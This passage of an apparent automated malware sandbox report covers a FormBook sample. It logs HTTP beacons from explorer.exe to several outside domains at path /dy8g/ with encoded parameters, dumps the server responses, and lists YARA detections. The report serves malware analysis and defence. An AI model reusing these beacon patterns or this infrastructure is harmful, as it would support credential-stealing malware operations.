                                                                  Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 65 63 6f 66 69 6e 67 65 72 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 63 6f 66 69 6e 67 65 72 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.ecofingers.com/' />a </head>9 <body>3a You are being redirected to http://www.ecofingers.coma </body>8</html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.64975834.102.136.18080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:47.034261942 CEST10389OUTGET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.invisiongc.net
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:47.172086954 CEST10390INHTTP/1.1 403 Forbidden
                                                                  Server: openresty
                                                                  Date: Thu, 22 Jul 2021 15:43:47 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 275
                                                                  ETag: "60f790d8-113"
                                                                  Via: 1.1 google
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.649760119.59.120.2680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:43:58.054111004 CEST10418OUTGET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.findfoodshop.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:43:58.298029900 CEST10419INHTTP/1.1 301 Moved Permanently
                                                                  Date: Thu, 22 Jul 2021 15:43:58 GMT
                                                                  Server: Apache/2
                                                                  Location: https://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx
                                                                  Content-Length: 341
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 69 6e 64 66 6f 6f 64 73 68 6f 70 2e 63 6f 6d 2f 64 79 38 67 2f 3f 69 30 47 44 4d 3d 34 77 7a 61 45 43 79 34 47 42 54 75 51 6e 49 54 62 4e 4c 70 75 37 41 4f 51 62 79 71 49 59 72 7a 4a 41 73 4a 4e 67 47 42 32 64 54 52 39 39 55 51 77 4a 64 74 2b 46 70 46 6b 4f 61 77 45 66 45 56 64 4f 6c 59 6f 58 41 76 6f 41 3d 3d 26 61 6d 70 3b 30 58 3d 43 36 41 68 33 76 50 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&amp;0X=C6Ah3vPx">here</a>.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.64976162.149.128.4080C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:44:03.542511940 CEST10420OUTGET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.scuolatua.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:03.612077951 CEST10421INHTTP/1.1 404 Not Found
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Server: Microsoft-IIS/8.5
                                                                  X-Powered-By: ASP.NET
                                                                  Date: Thu, 22 Jul 2021 15:44:03 GMT
                                                                  Connection: close
                                                                  Content-Length: 5045
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px
                                                                  Jul 22, 2021 17:44:03.612123013 CEST10423INData Raw: 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74
                                                                  Data Ascii: 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:
                                                                  Jul 22, 2021 17:44:03.612144947 CEST10424INData Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 20 0a 20 20 3c 68 33 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c
                                                                  Data Ascii: container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely cause
                                                                  Jul 22, 2021 17:44:03.612165928 CEST10425INData Raw: 3b 26 6e 62 73 70 3b 53 74 61 74 69 63 46 69 6c 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 45 72 72 6f 72 20 43 6f 64 65 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 30 78 38 30
                                                                  Data Ascii: ;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Request


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.649762103.138.88.1180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:44:09.256103992 CEST10427OUTGET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.okinawarongnho.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:09.556632996 CEST10427INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Thu, 22 Jul 2021 15:42:19 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.649763162.241.62.5480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:44:14.927139997 CEST10428OUTGET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.jorgeporcayo.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:15.720453024 CEST10429INHTTP/1.1 200 OK
                                                                  Date: Thu, 22 Jul 2021 15:44:15 GMT
                                                                  Server: Apache
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Retry-After: 86400
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Vary: Accept-Encoding
                                                                  Accept-Ranges: none
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 6f 76 69 6d 69 65 6e 74 6f 20 70 65 72 73 6f 6e 61 6c 20 79 20 73 6f 63 69 61 6c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 55 6e 64 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 50 61 67 65 20 70 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74
                                                                  Data Ascii: 91c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Movimiento personal y social" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.83" type="text/css"><link rel="stylesheet" href="htt
                                                                  Jul 22, 2021 17:44:15.720489979 CEST10431INData Raw: 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 66 6f 6e
                                                                  Data Ascii: p://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.83" type="text/css"><link rel="icon" sizes="128x128" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/i
                                                                  Jul 22, 2021 17:44:15.720509052 CEST10431INData Raw: 3e 0d 0a 0d 0a
                                                                  Data Ascii: >
                                                                  Jul 22, 2021 17:44:15.730438948 CEST10431INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:17:42:10
                                                                  Start date:22/07/2021
                                                                  Path:C:\Users\user\Desktop\v8kZUFgdD4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x400000
                                                                  File size:188889 bytes
                                                                  MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:42:10
                                                                  Start date:22/07/2021
                                                                  Path:C:\Users\user\Desktop\v8kZUFgdD4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x400000
                                                                  File size:188889 bytes
                                                                  MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
